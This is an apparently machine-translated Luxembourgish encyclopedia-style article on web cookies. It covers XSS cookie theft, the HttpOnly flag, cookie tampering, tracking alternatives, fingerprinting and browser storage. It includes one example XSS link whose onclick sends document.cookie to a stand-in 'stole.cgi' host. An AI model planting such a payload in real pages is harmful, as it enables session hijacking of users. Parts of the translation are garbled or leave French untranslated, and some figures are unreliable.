Dës Zort vun In-Site Scripting gëtt typesch vun Ugräifer op Siten benotzt déi d'Benotzer erlaben HTML Inhalt ze posten. Andeems Dir en Deel vum kompatiblen Code am HTML Bäitrag integréiert, kann en Ugräifer Cookien vun anere Benotzer kréien. D'Wësse vun dëse Cookien ka benotzt ginn andeems Dir op dee selwechte Site verbënnt mat de geklauten Cookien, sou datt de Benotzer unerkannt gëtt, deem seng Cookien geklaut goufen.
Ee Wee fir esou Attacken ze verhënneren ass den HttpOnly Fändel ze benotzen; et ass eng Optioun, agefouert zënter Versioun 6 vum Internet Explorer am PHP zënter Versioun 5.2.0, déi geplangt ass de Cookie fir de Client no beim Skript onzougänglech ze maachen. Wéi och ëmmer, Webentwéckler sollten dëst an hirer Entwécklung vum Site berücksichtegen, sou datt se immun géint Skripting op der Säit sinn.
Eng aner Sécherheetsbedrohung déi benotzt gëtt ass d'Demande Fabrikatioun um Site.
Déi offiziell technesch Spezifizéierung erlaabt datt Cookien nëmmen op Serveren am Domain zréckgeschéckt ginn, aus deem se hierkommen. Wéi och ëmmer, de Wäert vu Cookien kann op aner Servere mat anere Mëttelen wéi Cookie Header geschéckt ginn.
Besonnesch Skriptsprooche wéi JavaScript sinn allgemeng erlaabt Zougang zu Cookiewäerter ze kréien a si fäeg fir arbiträr Wäerter op all Server um Internet ze schécken. Dës Skriptfäegkeet gëtt vu Websäite benotzt, déi d'Benotzer erlaben HTML Inhalt ze posten fir aner Benotzer ze gesinn.
Zum Beispill kann en Ugräifer op der example.com Domain e Kommentar posten deen de folgende Link enthält, deen op e populäre Blog weist, deen se soss net kontrolléieren:
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
Wann en anere Benotzer op dëse Link klickt, fiert de Browser den onclick Attribut Deel vum Code aus, sou datt en den document.cookie String mat der Lëscht vun de Benotzer Cookien ersetzt, déi fir dës Säit aktiv sinn. Dofir gëtt dës Lëscht vu Cookien op de example.com Server geschéckt, an den Ugräifer ass dofir fäeg d'Cookien vun dësem Benotzer ze sammelen.
Dës Aart vun Attack ass schwéier op der Benotzersäit z'entdecken, well de Skript aus deemselwechten Domain kënnt deen de Cookie gesat huet, an d'Operatioun fir d'Wäerter ze schécken schéngt vun deem Domain autoriséiert ze sinn. Et gëtt ugeholl datt et d'Verantwortung vun den Administrateuren ass, déi dës Zort Site operéieren, Restriktiounen opzesetzen, déi d'Publikatioun vu béiswëllegen Code verhënneren.
Cookies sinn net direkt siichtbar fir Client-Säit Programmer wéi JavaScript wa se mam HttpOnly Fändel geschéckt goufen. Aus der Siicht vum Server ass den eenzegen Ënnerscheed datt an der Linn vum Set-Cookie Header en neit Feld bäigefüügt gëtt mat der String HttpOnly:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
Wann de Browser esou e Cookie kritt, soll et normalerweis am folgenden HTTP-Austausch benotzen, awer ouni et sichtbar ze maachen fir Scripten déi op der Client Säit ausgefouert ginn. Den HttpOnly Fändel ass net Deel vun enger offizieller technescher Spezifizéierung, an ass net an all Browser implementéiert. Notéiert datt et de Moment kee Wee gëtt fir d'Liesen a Schreiwen vu Sessiouns-Cookien duerch d'XMLHTTPRequest Method ze verhënneren.
Ännerung vum Inhalt: en Ugräifer schéckt en ongëlteg Cookie un e Server, méiglecherweis aus engem gültege Cookie, deen vum Server geschéckt gëtt.
Cookien änneren
Soubal d'Cookien musse gespäichert ginn an onverännert op de Server zréckginn, kann en Ugräifer de Wäert vun de Cookien änneren ier se op de Server zréckgeschéckt ginn. Zum Beispill, wann e Cookie den Gesamtwäert enthält, deen de Benotzer muss bezuelen fir d'Elementer, déi am Akafsweenchen vum Geschäft plazéiert sinn, setzt d'Verännerung vun dësem Wäert de Server dem Risiko aus, den Ugräifer manner wéi den Startpräis ze bezuelen. De Prozess fir de Wäert vu Cookien z'änneren gëtt genannt Cookie Vergëftung a kann nom Cookiedéif benotzt ginn fir den Attack persistent ze maachen.
An der Cookie-Iwwerschrëftmethod exploitéiert den Ugräifer e Browser-Glitch fir en ongülteg Cookie op de Server ze schécken.
Déi meescht Websäite späicheren awer nëmmen eng Sessiouns-ID - eng zoufälleg generéiert eenzegaarteg Zuel, déi benotzt gëtt fir de Sessiounsbenotzer z'identifizéieren - am Cookie selwer, während all aner Informatioun um Server gespäichert ass. An dësem Fall ass dëse Problem gréisstendeels geléist.
Cookie Ëmgank tëscht Websäiten
All Site gëtt erwaart seng eege Cookien ze hunn, sou datt ee Site net fäeg ass Cookien mat enger anerer Säit z'änneren oder ze kreéieren. E Webbrowser Sécherheetsfehler kann béiswëlleg Siten erlaben dës Regel ze briechen. D'Ausbeutung vun esou engem Feeler gëtt allgemeng als Kräiz-Site Kachen. Den Zweck vun esou Attacke kann Sessioun ID Déifstall sinn.
D'Benotzer sollten déi lescht Versioune vu Webbrowser benotzen, an deenen dës Schwachstelle quasi éliminéiert sinn.
Konflikt Staat tëscht Client a Server
D'Benotzung vu Cookien kann e Widdersproch tëscht dem Zoustand vum Client an dem Staat am Cookie gespäichert generéieren. Wann de Benotzer e Cookie kritt an op de "Back" Knäppchen vum Browser klickt, ass den Zoustand vum Browser allgemeng net déiselwecht wéi virun dëser Acquisitioun. Zum Beispill, wann de Kuerf vun engem Online-Geschäft mat Cookien erstallt gëtt, kann den Inhalt vum Kuerf net änneren wann de Benotzer an d'Browsergeschicht zréckkënnt: wann de Benotzer e Knäppchen dréckt fir en Artikel a sengem Kuerf ze addéieren a klickt op "Zréckkomm" " Knäppchen, den Artikel bleift an dësem. Dëst ass vläicht net d'Absicht vum Benotzer, dee sécherlech d'Additioun vum Artikel wëll annuléieren. Dëst kann zu Onverlässegkeet, Duercherneen a Käfere féieren. Also Webentwéckler sollten dëse Problem bewosst sinn an Moossname implementéieren fir Situatiounen wéi dës ze handhaben.
Cookie Verfall
Persistent Cookien goufe vu Privatsphär Sécherheetsexperten kritiséiert fir net agestallt ze sinn fir séier genuch auszelafen, wouduerch Websäiten d'Benotzer verfollegen an hire Profil iwwer Zäit opbauen. Dësen Aspekt vu Cookien ass och Deel vum Sessiounshacking Problem, well e geklauten persistent Cookie ka benotzt ginn fir e Benotzer fir eng bedeitend Zäit ze imitéieren.
Fir ze liesen: GAFAM: Wien sinn se? Firwat sinn se (heiansdo) sou grujeleg?
Alternativen zu Cookien
E puer Operatiounen, déi mat Cookien ausgefouert kënne ginn, kënnen och mat anere Mechanismen ausgefouert ginn, déi Cookien ëmgoen oder geläscht Cookien nei erstellen, wat Privatsphärprobleemer op déiselwecht Manéier erstellt (oder heiansdo méi schlëmm well dann onsichtbar) wéi Cookien.
IP Adress
D'Benotzer kënne mat der IP Adress vum Computer verfollegt ginn, deen d'Säit nennt. Dës Technik ass verfügbar zënter der Aféierung vum World Wide Web, wéi Säiten erofgeluede ginn, freet de Server d'IP Adress vum Computer deen de Browser oder de Proxy leeft, wa kee benotzt gëtt. De Server kann dës Informatioun verfollegen ob et Cookien am Gebrauch sinn oder net. Wéi och ëmmer, dës Adresse sinn typesch manner zouverlässeg fir e Benotzer z'identifizéieren wéi Cookien well Computeren a Proxyen vu ville Benotzer gedeelt kënne ginn, an dee selwechte Computer kann eng aner IP Adress op all Aarbechtssitzung kréien (wéi c dacks de Fall fir Telefonverbindungen) .
Tracking duerch IP Adressen kann an e puer Situatiounen zouverlässeg sinn, wéi Breetbandverbindungen, déi déi selwecht IP Adress fir eng laang Zäit behalen, soulaang d'Kraaft op ass.
E puer Systemer wéi Tor sinn entwéckelt fir d'Anonymitéit vum Internet z'erhalen an d'Verfolgung vun der IP Adress onméiglech oder onpraktesch ze maachen.
URL
Eng méi präzis Technik baséiert op d'Integratioun vun Informatioun an URLen. De Query String Deel vun der URL ass eng Technik déi typesch fir dësen Zweck benotzt gëtt, awer aner Deeler kënnen och benotzt ginn. Souwuel de Java Serverlet wéi och de PHP Sessiounsmechanismus benotzen dës Method wann Cookien net aktivéiert sinn.
Dës Method beinhalt de Webserver, deen String Ufroen un d'Links vun der Websäit bäidréit, déi et dréit wann se an de Browser geschéckt gëtt. Wann de Benotzer e Link verfollegt, gëtt de Browser déi befestegt Ufrostring op de Server zréck.
Query Strings, déi fir dësen Zweck benotzt ginn a Cookien si ganz ähnlech, souwuel sinn Informatioun, déi arbiträr vum Server gewielt gëtt a vum Browser zréckginn. Wéi och ëmmer, et ginn e puer Differenzen: wann eng URL mat enger Ufro String weiderbenotzt gëtt, gëtt déiselwecht Informatioun un de Server geschéckt. Zum Beispill, wann d'Astellunge vun engem Benotzer an enger Ufro String vun enger URL kodéiert sinn an de Benotzer dës URL un en anere Benotzer per E-Mail schéckt, kann dee Benotzer och dës Virléiften benotzen.
Op der anerer Säit, wann e Benotzer zweemol op déi selwecht Säit zougräift, gëtt et keng Garantie datt déiselwecht Ufro String béid Kéier benotzt gëtt. Zum Beispill, wann e Benotzer op enger Säit vun enger interner Säit Säit déi éischte Kéier landen an op der selwechter Säit vun enger externer Säit déi zweete Kéier landen, ass d'Ufro String relativ zu der Säit Säit typesch anescht, während d'Cookien d'selwecht sinn .
Aner Nodeeler vun Ufro Strings bezéie sech op Sécherheet: Date behalen, déi eng Sessioun an Ufro Strings identifizéiert, erméiglecht oder vereinfacht Sessiounsfixatiounsattacken, Identifizéierer Referenzattacken an aner Ausnotzen. Passéiere vun Sessiouns-IDen als HTTP-Cookien ass méi sécher.
Verstoppt Form Feld
Eng Form vu Sessiounsverfollegung, benotzt vun ASP.NET, ass Webformulare mat verstoppte Felder ze benotzen. Dës Technik ass ganz ähnlech wéi d'URL Ufro Strings ze benotzen fir Informatioun ze droen an huet déiselwecht Virdeeler an Nodeeler; a wann d'Form mat der HTTP GET Method veraarbecht gëtt, ginn d'Felder tatsächlech Deel vun der URL vum Browser, deen et schéckt wann de Formulaire ofgitt. Awer déi meescht Forme gi mat HTTP POST veraarbecht, wat verursaacht datt d'Forminformatioun, inklusiv verstoppte Felder, als zousätzlech Input bäigefüügt gëtt, deen weder Deel vun der URL nach e Cookie ass.
Dës Approche huet zwee Virdeeler aus enger Tracking Perspektiv: éischtens, d'Verfollegung vun der Informatioun am HTML Quellcode an POST Input anstatt d'URL ze verfolgen erlaabt den duerchschnëttleche Benotzer dës Tracking ze vermeiden; zweetens, d'Sessiounsinformatioun gëtt net kopéiert wann de Benotzer d'URL kopéiert (fir d'Säit op Disk ze späicheren oder se per E-Mail ze schécken, zum Beispill).
window.name
All üblech Webbrowser kënnen eng zimlech grouss Quantitéit un Daten (2MB bis 32MB) iwwer JavaScript späicheren mat der DOM's window.name Eegeschafte. Dës Donnéeë kënnen anstatt Sessiouns-Cookien benotzt ginn a ginn och iwwer Domaine benotzt. D'Technik kann mat JSON Objete gekoppelt ginn fir e komplexe Set vu Client-Säit Sessiounsvariablen ze späicheren.
De Nodeel ass, datt all separat Fënster oder Tab am Ufank eng eidel window.name; wann Dir duerch Tabs surft (vum Benotzer opgemaach) heescht dat datt déi individuell opgemaach Tabs keen Fënsternumm hunn. Zousätzlech kann window.name benotzt ginn fir Besucher iwwer verschidde Site ze verfolgen, déi e Privatsphärprobleem stellen.
An e puer Hisiichte kann dëst méi sécher sinn wéi Cookien, wéinst der Net-Involvatioun vum Server, sou datt et onverwëlleg ass fir den Netzwierkattack vu Sniffer Cookien. Wann awer speziell Moossname geholl gi fir d'Donnéeën ze schützen, ass et vulnérabel fir weider Attacken, well d'Donnéeën iwwer aner Siten, déi an der selwechter Fënster opgemaach sinn, verfügbar sinn.
HTTP Authentifikatioun
Den HTTP-Protokoll enthält d'Basis-Authentifizéierungsprotokoller an den Zougangsauthentifikatiounsverdauung, deen Zougang zu enger Websäit nëmmen erlaabt wann de Benotzer de Benotzernumm a Passwuert uginn huet. Wann de Server e Certificat freet fir Zougang zu enger Websäit ze ginn, freet de Browser et vum Benotzer an eemol kritt, späichert de Browser et a schéckt et an all spéider HTTP-Ufroen. Dës Informatioun kann benotzt ginn fir de Benotzer ze verfolgen.
Lokal gedeelt Objet
Wann e Browser den Adobe Flash Player Plugin enthält, ass de lokal gedeelt Objeten kënne fir dee selwechten Zweck wéi Cookien benotzt ginn. Si kënnen eng attraktiv Wiel fir Webentwéckler sinn well:
- d'Standardgréisst Limit fir e lokalen gemeinsamen Objet ass 100 KB;
- Sécherheetskontrolle sinn getrennt vu Benotzer-Cookie-Checken (sou datt lokal gedeelt Objeten erlaabt sinn wann Cookien net sinn).
Dëse leschte Punkt, deen d'Cookie-Management-Politik ënnerscheet vun där vun Adobe's lokalen gemeinsamen Objeten stellt Froen op betreffend d'Gestioun vum Benotzer vu senge Privatsphär-Astellungen: hie muss sech bewosst sinn datt seng Gestioun vu Cookien keen Impakt op d'Gestioun vu lokalen gemeinsamen Objeten huet, a vice versa.
Eng aner Kritik un dësem System ass datt et nëmmen duerch den Adobe Flash Player Plugin benotzt ka ginn, deen propriétaire ass an net e Webstandard.
Client-Säit Persistenz
E puer Webbrowser ënnerstëtzen e Skript-baséiert Persistenzmechanismus, deen d'Säit erlaabt Informatioun lokal ze späicheren fir spéider Notzung. Internet Explorer, zum Beispill, ënnerstëtzt persistent Informatioun an der Browsergeschicht, Lieszeechen, an engem Format dat am XML gespäichert ass oder direkt mat enger Websäit op Disk gespäichert. Fir Microsoft Internet Explorer 5 gëtt et eng User-Datenmethod verfügbar duerch DHTML Verhalen.
De W3C huet an HTML 5 eng nei JavaScript API fir Client-Säit Datelagerung genannt Webspeicher a zielt fir permanent Cookien ze ersetzen. Et ass ähnlech wéi Cookien awer mat staark verbesserte Kapazitéit an ouni Informatioun am Header vun HTTP-Ufroen ze späicheren. D'API erlaabt zwou Zorte vu Weblagerung: lokal Späicheren a Sessiounsspeicher, ähnlech wéi persistent Cookien a Sessiouns Cookien (ausser datt Sessiouns Cookien auslafen wann de Browser zou ass Sëtzungslagerung oflafen wann d'Tab zou ass), respektiv. Weblagerung gëtt ënnerstëtzt vu Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 an Opera 10.50.
En anere Mechanismus setzt normalerweis op Browser-Caching (am Erënnerung anstatt Erfrëschung) mat JavaScript Programmer op Websäiten.
Zum Beispill kann eng Säit den Tag enthalen . La première fois que la page se charge, le programme exemple.js est aussi chargé.
Zu dësem Zäitpunkt bleift de Programm am Cache-Erënnerung an déi besicht Säit gëtt net eng zweete Kéier nei gelueden. Dofir, wann de Programm eng global Variabel enthält (zum Beispill var id = 3243242;), bleift dësen Identifizéierer gëlteg a kann duerch aner JavaScript Code exploitéiert ginn wann d'Säit erëm gelueden ass, oder eemol eng Säit déi de Programm verbënnt gelueden ass.
De groussen Nodeel vun dëser Method ass datt d'JavaScript global Variabel statesch muss sinn, dat heescht datt se net wéi e Cookie geännert oder geläscht ka ginn.
Webbrowser Fangerofdrock
E Browser Fangerofdrock ass Informatioun gesammelt iwwer d'Konfiguratiounsastellunge vun engem Browser fir Identifikatiounszwecker. Dës Fangerofdréck kënne benotzt ginn fir en Internet Benotzer oder en Apparat voll oder deelweis z'identifizéieren, och wann Cookien ausgeschalt sinn.
Basis Webbrowser Konfiguratiounsinformatioun gouf laang vun Websäit Publikumsservicer gesammelt fir den Zweck vum mënschleche Webverkéier präzis ze moossen a verschidde Forme vu Klickbedruch z'entdecken. Mat der Hëllef vu Client-Säit Skriptesproochen ass vill méi genee Informatiounssammlung elo méiglech.
Dës Informatioun an e bësse String ëmsetzen produzéiert en Apparat Fangerofdrock. Am Joer 2010 huet d'Electronic Frontier Foundation (EFF) d'Entropie vum Fangerofdrock vun engem Browser op d'mannst gemooss. 18,1 ausmëcht, an dat war virum Fortschrëtter am Canvas Fangerofdrock 5,7 Bits zu där Entropie bäigefüügt.
Cookien an enger Nossschuel
Cookies si kleng Textdateien, déi vum Webbrowser op der Festplack vum Besucher vun engem Websäit gespäichert ginn an déi (ënner anerem) benotzt gi fir Informatioun iwwer de Besucher oder seng Rees duerch de Site opzehuelen. De Webmaster kann also d'Gewunnechten vun engem Visiteur erkennen an d'Presentatioun vu sengem Site fir all Visiteur personaliséieren; Cookien maachen et dann méiglech ze erënneren wéi vill Artikelen op der Homepage ze weisen oder souguer d'Login-Umeldungsinformatioune fir all privat Partei ze behalen: Wann de Besucher op de Site zréckkënnt, ass et net méi néideg fir hien säin Numm a Passwuert ze schreiwen unerkannt ginn, well se automatesch am Cookie gelies ginn.
E Cookie huet eng limitéiert Liewensdauer, gesat vum Site Designer. Si kënnen och um Enn vun der Sessioun um Site oflafen, wat dem Zoumaache vum Browser entsprécht. Cookies gi wäit benotzt fir d'Besucher d'Liewen méi einfach ze maachen an hinnen méi relevant Informatioun ze presentéieren. Awer speziell Techniken maachen et méiglech, e Besucher op verschiddene Site ze verfollegen an domat ganz extensiv Informatioun iwwer seng Gewunnechten ze sammelen an ze iwwerpréiwen. Dës Method huet d'Benotzung vu Cookien e Ruff als Iwwerwaachungstechnik ginn, déi d'Privatsphär vun de Besucher verletzt, wat leider der Realitéit entsprécht a ville Fäll vu Gebrauch aus net-technesche Grënn oder net respektéiert de Benotzererwaardungen. .
Als Äntwert op dës legitim Ängscht stellt HTML 5 eng nei JavaScript API fir Client-Säit Datelagerung vir, genannt Webspeicher, déi vill méi sécher ass a mat méi grousser Kapazitéit, déi zielt fir Cookien ze ersetzen.
Stockage vun Cookien
Mat e puer Browser ass e Cookie einfach z'änneren, en einfachen Texteditor wéi Notepad ass genuch fir seng Wäerter manuell z'änneren.
Cookies ginn anescht gespäichert ofhängeg vum Browser:
- Microsoft Internet Explorer späichert all Cookie an enger anerer Datei;
- Mozilla Firefox späichert all seng Cookien an enger eenzeger Datei;
- Oper späichert all seng Cookien an enger eenzeger Datei a verschlësselt se (onméiglech se ze änneren ausser an de Softwareoptiounen);
- Apple Safari späichert all seng Cookien an enger eenzeger .plist Extensiounsdatei. Modifikatioun ass méiglech awer net ganz einfach, ausser Dir gitt duerch d'Softwareoptiounen.
Browser sinn erfuerderlech fir z'ënnerstëtzen op d 'mannst :
- 300 simultan Cookien;
- 4 o pro Cookie;
- 20 Cookien pro Host oder Domain.
